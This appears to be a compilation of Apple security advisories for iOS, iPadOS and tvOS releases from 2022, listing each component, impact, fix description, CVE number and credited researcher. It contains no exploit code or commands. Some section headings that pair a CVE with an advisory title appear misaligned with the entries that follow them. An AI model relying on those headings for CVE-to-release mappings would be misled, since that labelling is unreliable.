Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management. 

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A race condition was addressed with improved locking. 

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved bounds checks.

CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A logic issue was addressed with improved checks. 

CVE-2022-42801: Ian Beer of Google Project Zero

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32924: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42808: Zweig of Kunlun Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42827: an anonymous researcher

**Model I/O**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing a maliciously crafted USD file may disclose memory contents 

Description: The issue was addressed with improved memory handling. 

CVE-2022-42810: Xingwei Lin (@xwlin\_roy) and Yinyi Wu of Ant Security Light-Year Lab

Entry added October 27, 2022

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A buffer overflow may result in arbitrary code execution 

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32941: an anonymous researcher

Entry added October 27, 2022

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-42829: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42830: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42831: an anonymous researcher

CVE-2022-42832: an anonymous researcher

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: A logic issue was addressed with improved state management.

CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago

Entry added October 27, 2022

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2022-42811: Justin Bui (@slyd0g) of Snowflake

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A shortcut may be able to check the existence of an arbitrary path on the file system

Description: A parsing issue in the handling of directory paths was addressed with improved path validation.

CVE-2022-32938: Cristian Dinca of Tudor Vianu National High School of Computer Science of. Romania

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Visiting a malicious website may lead to user interface spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 243693  
CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 245058  
CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University, Dohyun Lee (@l33d0hyun) of DNSLab at Korea University

**WebKit PDF**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 242781  
CVE-2022-32922: Yonghwi Jin (@jinmo123) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose internal states of the app

Description: A correctness issue in the JIT was addressed with improved checks.

WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype\_pwn) of KAIST Hacking Lab

Entry added October 27, 2022

**Wi-Fi**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Joining a malicious Wi-Fi network may result in a denial-of-service of the Settings app 

Description: The issue was addressed with improved memory handling.

CVE-2022-32927: Dr Hideaki Goto of Tohoku University, Japan

Entry added October 27, 2022

**zlib**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A user may be able to cause unexpected app termination or arbitrary code execution 

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

Entry added October 27, 2022

CVE-2022-32946: About the security content of iOS 16.1 and iPadOS 16

A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 15.7 and iPadOS 15.7, iOS 16.1 and iPadOS 16. An app may be able to access iOS backups.

Released October 27, 2022

**Apple Neural Engine**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32932: Mohamed Ghannam (@\_simo36)

**Audio**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

**Backup**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to access iOS backups

Description: A permissions issue was addressed with additional restrictions.

CVE-2022-32929: Csaba Fitzl (@theevilbit) of Offensive Security

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2022-32935: Bistrit Dahal

**Graphics Driver**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32939: Willy R. Vasquez of The University of Texas at Austin

**Image Processing**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32949: Tingting Yin of Tsinghua University

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-42827: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42801: Ian Beer of Google Project Zero

**Model I/O**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted USD file may disclose memory contents

Description: The issue was addressed with improved memory handling.

CVE-2022-42810: Xingwei Lin (@xwlin\_roy) and Yinyi Wu of Ant Security Light-Year Lab

**ppp**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32941: an anonymous researcher

**Safari**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: A logic issue was addressed with improved state management.

CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may disclose internal states of the app

Description: A correctness issue in the JIT was addressed with improved checks.

WebKit Bugzilla: 242964  
CVE-2022-32923: Wonyoung Jung (@nonetype\_pwn) of KAIST Hacking Lab

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Joining a malicious Wi-Fi network may result in a denial-of-service of the Settings app

Description: The issue was addressed with improved memory handling.

CVE-2022-32927: Dr Hideaki Goto of Tohoku University, Japan

**zlib**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

CVE-2022-32929: About the security content of iOS 15.7.1 and iPadOS 15.7.1

A logic issue was addressed with improved state management. This issue is fixed in iOS 16. Deleted contacts may still appear in spotlight search results.

Released September 12, 2022

**Accelerate Framework**

Available for: iPhone 8 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-42795: ryuzaki

Entry added October 27, 2022

**AppleAVD**

Available for: iPhone 8 and later

Impact: An app may be able to cause a denial-of-service

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32827: Antonio Zekic (@antoniozekic), Natalie Silvanovich of Google Project Zero, and an anonymous researcher

Entry added October 27, 2022

**AppleAVD**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee\_\_)

Entry added October 27, 2022

**Apple Neural Engine**

Available for: iPhone 8 and later

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2022-32858: Mohamed Ghannam (@\_simo36)

Entry added October 27, 2022

**Apple Neural Engine**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32898: Mohamed Ghannam (@\_simo36)

CVE-2022-32899: Mohamed Ghannam (@\_simo36)

CVE-2022-32889: Mohamed Ghannam (@\_simo36)

Entry added October 27, 2022

**Apple TV**

Available for: iPhone 8 and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved handling of caches.

CVE-2022-32909: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added October 27, 2022

**Contacts**

Available for: iPhone 8 and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved checks.

CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

**Crash Reporter**

Available for: iPhone 8 and later

Impact: A user with physical access to an iOS device may be able to read past diagnostic logs

Description: This issue was addressed with improved data protection.

CVE-2022-32867: Kshitij Kumar and Jai Musunuri of Crowdstrike

Entry added October 27, 2022

**DriverKit**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32865: Linus Henze of Pinauten GmbH (pinauten.de)

Entry added October 27, 2022

**Exchange**

Available for: iPhone 8 and later

Impact: A user in a privileged network position may be able to intercept mail credentials

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32928: an anonymous researcher

Entry added October 27, 2022

**GPU Drivers**

Available for: iPhone 8 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26744: an anonymous researcher

Entry added October 27, 2022

**GPU Drivers**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32903: an anonymous researcher

Entry added October 27, 2022

**ImageIO**

Available for: iPhone 8 and later

Impact: Processing an image may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved validation.

CVE-2022-1622

Entry added October 27, 2022

**Image Processing**

Available for: iPhone 8 and later

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added October 27, 2022

**IOGPUFamily**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32887: an anonymous researcher

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32914: Zweig of Kunlun Lab

Entry added October 27, 2022

**Kernel**

Available for: iPhone 8 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)

CVE-2022-32911: Zweig of Kunlun Lab

Entry updated October 27, 2022

**Kernel**

Available for: iPhone 8 and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 8 and later

Impact: An application may be able to execute arbitrary code with kernel privileges.

Description: The issue was addressed with improved bounds checks.

CVE-2022-32917: an anonymous researcher 

**Maps**

Available for: iPhone 8 and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32883: Ron Masas, breakpointhq.com

**MediaLibrary**

Available for: iPhone 8 and later

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**Notifications**

Available for: iPhone 8 and later

Impact: A user with physical access to a device may be able to access contacts from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-32879: Ubeydullah Sümer

Entry added October 27, 2022

**Photos**

Available for: iPhone 8 and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved data protection.

CVE-2022-32918: an anonymous researcher, Jugal Goradia of Aastha Technologies, Srijan Shivam Mishra of The Hack Report, Evan Ricafort (evanricafort.com) of Invalid Web Security, Amod Raghunath Patwardhan of Pune, India, Ashwani Rajput of Nagarro Software Pvt. Ltd

Entry added October 27, 2022

**Safari**

Available for: iPhone 8 and later

Impact: Visiting a malicious website may lead to address bar spoofing

Description: This issue was addressed with improved checks.

CVE-2022-32795: Narendra Bhati of Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati

**Safari Extensions**

Available for: iPhone 8 and later

Impact: A website may be able to track users through Safari web extensions

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

**Sandbox**

Available for: iPhone 8 and later

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added October 27, 2022

**Security**

Available for: iPhone 8 and later

Impact: An app may be able to bypass code signing checks

Description: An issue in code signature validation was addressed with improved checks.

CVE-2022-42793: Linus Henze of Pinauten GmbH (pinauten.de)

Entry added October 27, 2022

**Shortcuts**

Available for: iPhone 8 and later

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32872: Elite Tech Guru

**Sidecar**

Available for: iPhone 8 and later

Impact: A user may be able to view restricted content from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-42790: Om kothawade of Zaprico Digital

Entry added October 27, 2022

**Siri**

Available for: iPhone 8 and later

Impact: A user with physical access to a device may be able to use Siri to obtain some call history information

Description: A logic issue was addressed with improved state management.

CVE-2022-32870: Andrew Goldberg of The McCombs School of Business, The University of Texas at Austin (linkedin.com/andrew-goldberg-/)

Entry added October 27, 2022

**SQLite**

Available for: iPhone 8 and later

Impact: A remote user may be able to cause a denial-of-service

Description: This issue was addressed with improved checks.

CVE-2021-36690

Entry added October 27, 2022

**Time Zone**

Available for: iPhone 8 and later

Impact: Deleted contacts may still appear in spotlight search results

Description: A logic issue was addressed with improved state management.

CVE-2022-32859

Entry added October 27, 2022

**Watch app**

Available for: iPhone 8 and later

Impact: An app may be able to read a persistent device identifier

Description: This issue was addressed with improved entitlements.

CVE-2022-32835: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Entry added October 27, 2022

**Weather**

Available for: iPhone 8 and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved state management.

CVE-2022-32875: an anonymous researcher

Entry added October 27, 2022

**WebKit**

Available for: iPhone 8 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

Entry added October 27, 2022

**WebKit**

Available for: iPhone 8 and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 243236  
CVE-2022-32891: @real\_as3617, and an anonymous researcher

Entry added October 27, 2022

**WebKit**

Available for: iPhone 8 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

**WebKit**

Available for: iPhone 8 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

**WebKit Sandboxing**

Available for: iPhone 8 and later

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with improvements to the sandbox.

WebKit Bugzilla: 243181  
CVE-2022-32892: @18楼梦想改造家 and @jq0904 of DBAppSecurity's WeBin lab

Entry added October 27, 2022

**Wi-Fi**

Available for: iPhone 8 and later

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32925: Wang Yu of Cyberserval

Entry added October 27, 2022

CVE-2022-32859: About the security content of iOS 16

A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 16, iOS 16, watchOS 9. An app may be able to execute arbitrary code with kernel privileges.

Released September 12, 2022

**Accelerate Framework**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-42795: ryuzaki

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee\_\_)

**GPU Drivers**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32903: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing an image may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved validation.

CVE-2022-1622

**Image Processing**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

**Image Processing**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD 

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: This issue was addressed with improved checks. 

CVE-2022-32949: Tingting Yin of Tsinghua University

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)

CVE-2022-32911: Zweig of Kunlun Lab

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32914: Zweig of Kunlun Lab

**MediaLibrary**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**Notifications**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A user with physical access to a device may be able to access contacts from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-32879: Ubeydullah Sümer

**Sandbox**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

**SQLite**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote user may be able to cause a denial-of-service

Description: This issue was addressed with improved checks.

CVE-2021-36690

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472), xmzyshypnc(@xmzyshypnc1)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 242762  
CVE-2022-32891: @real\_as3617, an anonymous researcher

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32925: Wang Yu of Cyberserval

Tag

#webkit